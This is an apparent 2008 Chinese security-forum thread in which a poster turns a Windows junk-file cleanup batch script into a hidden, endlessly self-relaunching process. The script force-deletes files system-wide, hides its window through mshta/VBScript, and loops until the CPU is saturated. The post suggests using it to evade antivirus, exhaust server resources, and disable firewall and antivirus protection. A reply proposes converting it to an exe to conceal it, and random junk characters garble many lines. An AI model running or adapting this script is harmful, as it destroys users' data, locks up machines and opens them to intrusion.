Board logo

标题: 【原创】再谈垃圾清除的批处理和其流氓运用! [打印本页]

作者: 平湖秋月    时间: 2008-9-13 23:51     标题: 【原创】再谈垃圾清除的批处理和其流氓运用!

大家经常会看到这个垃圾清除的的BAT程序,也就是很多人所说的30秒清除所有的系统他及程序    说实话这个批处理效果确实不错 ,速度快而且不重不漏!系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善,要是能够自动检测系统中的垃圾文件并且删除那该多好啊!
6 ~5 A4 c: q5 R) s9 oa.bat源代码如下:+ g- g8 n8 z/ k9 Q, a
7 r5 L2 Q1 ^; O: v* N: s; K7 c

& y/ L6 q& ^7 m! A* x+ \===可以直接保存改名a.bat=====================
1 l6 j& X$ x/ G6 [) r+ a% Y5 C7 ~- l@echo off
) D3 s1 j! |! R6 |- l# Uecho 正在清除系统垃圾文件,请稍等......
/ R' `" h6 n9 S3 l+ k! a" F1 M8 g@del /f /s /q %systemdrive%\*.tmp ( M0 ^$ w0 D5 j, Z7 ]8 t; n
@del /f /s /q %systemdrive%\*._mp
" q6 {; s, J* [- \& z- |@del /f /s /q %systemdrive%\*.log
! J7 S3 k6 L7 @  A2 k@del /f /s /q %systemdrive%\*.gid
# J4 j' U; E8 {1 U3 t- Z@del /f /s /q %systemdrive%\*.chk + R$ P2 S4 L7 ^/ `6 k3 ^
@del /f /s /q %systemdrive%\*.old 6 E* r7 L, g6 v' i4 E) A
@del /f /s /q %systemdrive%\recycled\*.*
, \) q; w* \) H1 ]. O@del /f /s /q %windir%\*.bak
1 o" m0 q& m& U4 L@del /f /s /q %windir%\prefetch\*.*
; W' ^5 n1 q$ s8 {@rd /s /q %windir%\temp & md %windir%\temp + v6 e! @! O. g  Z
@del /f /q %userprofile%\cookies\*.* : C5 I: T: m+ Q; Y/ i0 ]7 g
@del /f /q %userprofile%\recent\*.*
  k, x" ~: S; h, h9 F% q4 L4 \@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" " @9 z. J1 M3 J9 W0 G
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*" 1 K, T- D' I6 x/ G* y
@del /f /s /q "%userprofile%\recent\*.*" , \# Q7 B7 A: n
echo 清除系统LJ完成!
, A- C, s0 q. \; S; O
其实简单的一句话便实现了那个功能,在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了,命令的意思大家都懂,我就不做解释了!我运行了一下,到是能够自动检测和删除了,而且关掉对话框也简单,直接关闭就行了!但是如果 被当作入侵工具却又点太暴露,并且那个DOS框始终不能隐藏,很容易被发现.这该怎么办?想想批处理里面的命令,貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!我的QQ:118122875),于是到网上找了一下,决定用VBS代码实现,于是又加上了下面的代码,其实也很简单,也就加了一句话进去:( ?% r( a  Y8 h! f

: L: V2 g8 t/ O' C1 q, A$ Y===可以直接保存改名为a.bat(一定要是a.bat哦具体说明原因你应该明白吧======
- ?6 Q" S( @2 T( O( E  u
@echo off5 T! x; l7 h0 \" V- @' @
if "%1" == "h" goto begin$ @# n# e( f" Q, l$ ?  k3 C
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit: s4 V. i5 o* T1 \5 C! A/ e9 m; Z
:begin
5 ^* l0 M/ l7 ~# Uecho 正在清除系统垃圾文件,请稍等......
% m9 e, {' m( M% T2 X- d( {0 K@@del /f /s /q %systemdrive%\*.tmp ! @% @. p, t% j+ d, i
@del /f /s /q %systemdrive%\*._mp & {% C. A6 T/ _
@del /f /s /q %systemdrive%\*.log
6 O  w' b4 o4 V; C! A@del /f /s /q %systemdrive%\*.gid
$ J% Q% ^: w; K+ z) @9 Y& u@del /f /s /q %systemdrive%\*.chk 4 M& }9 l! a) ?$ ?  B% n% r
@del /f /s /q %systemdrive%\*.old
9 C2 Z3 m: x3 T5 D& b. E% P3 {@del /f /s /q %systemdrive%\recycled\*.*
9 E, x& p5 Z; F@del /f /s /q %windir%\*.bak ; }8 j. ?) E# M& }, L
@del /f /s /q %windir%\prefetch\*.* + e! F0 h- u( {( ]5 X
@rd /s /q %windir%\temp & md %windir%\temp - O: N3 y8 ~$ e. Z+ c3 p. `& e
@del /f /q %userprofile%\cookies\*.* , R$ ~# x. K/ Q. e: B- F; T
@del /f /q %userprofile%\recent\*.*
8 B6 g' C4 A9 P7 C4 P: I@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
' r0 y; q3 a/ J1 u@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
3 w) Y+ p0 q2 M8 S* x@del /f /s /q "%userprofile%\recent\*.*"
/ B. @1 j+ d. X' }  Oecho 清除系统LJ完成!
" g5 {! I' |' _# dcall a.bat
" @- g3 \0 R6 l8 A1 z- p
运行看看!什么效果?
3 i# z7 O8 V7 O对话框消失了!打开任务管理器查看显示CPU运用:100%    看进程里面cmd.exe占用CPU:99     本来想删除这个进程,但是哪晓得点右键准备去删除那个cmd.exe,没有想到不见了,然后仔细一看,其实cmd.exe没有不见,但是已经PID不一样了,也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环,这时候有的朋友会想可以用taskkill命令来删除进程,但是PID几乎是每2秒换一次,你的速度有那么快?!目前我还没找到解决的办法(高手请指教),无赖只好重新启动...哎!其实这都是雕虫小技,只不过是最基础的东西,但是有的时候最简单的也是最要命的!
4 a0 w  V8 ^, }5 G0 o& O+ o' ]; u) s3 F; a/ b; |
你说,我们可以利用这个BAT做些什么:3 v8 u! }  l0 y1 s; S1 R, h

: Z# g& O8 k% X( Z( x; w1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序,当然咯,重复的循环安装时没有必要的,我只是打个比方,你可以自己改动代码达到自己的目的!
5 V6 N6 m8 \1 o1 }9 ]8 O, \5 }2.它循环使用消耗资源,如果这样的程序多弄几个,全部启动.你说服务器会怎么样?! Y& g# T) h  B9 R8 j
3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码,那不是更好?当然这些应用都是我个人的一些分析,没有真正的实验过,我想一个可以成功的通过~不过,这个小东西还有个美中不足,cmd.exe在进程里面看得到,至于怎么隐藏,那就请各位高手指教了,在下刚刚接触批处理,莱鸟一个,有什么不对的地方和我联系啊!我的QQ:118122875 平湖秋月

作者: 上帝的爱    时间: 2008-9-14 05:03

想法非常不错
作者: 柔肠寸断    时间: 2008-9-14 17:34

打个岔,流氓的应用,呵呵
作者: 柔肠寸断    时间: 2008-9-14 17:38

现在来正经的回答下问题:
3 [% B/ u- |) G: G8 J3 b1、在bat下隐藏对话框,可以使用一个参数的,但是我记不得了! c7 z4 n+ j8 s# m' ~: S
0 t# l, i1 O1 i" Q! |/ x5 u  I: N& {
2、可以将bat转换成exe格式的文件啊,使用bat2exe,下次我找到了就发出来哈
作者: 问道小生    时间: 2008-9-14 19:03

其实这个批处理还有一个问题,就是把log文件一律也作为垃圾处理了~~~
8 S! ~3 D4 C$ Y: j部分软件卸载是需要log文件的,删除了它,就会造成软件无法正常卸载,或者卸载不干净。因此,log文件并不是垃圾,不同软件计录的log文件有着不同的作用,有的甚至是非常重要的,不是可以随便删除的,例如:一张CD碟片就有一个log日志文件,它主要记录EAC对CD抓轨的各项参数。
作者: 平湖秋月    时间: 2008-9-15 21:43

楼上的你们说的都有道理 理论上是成立的 我有时间试试看




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2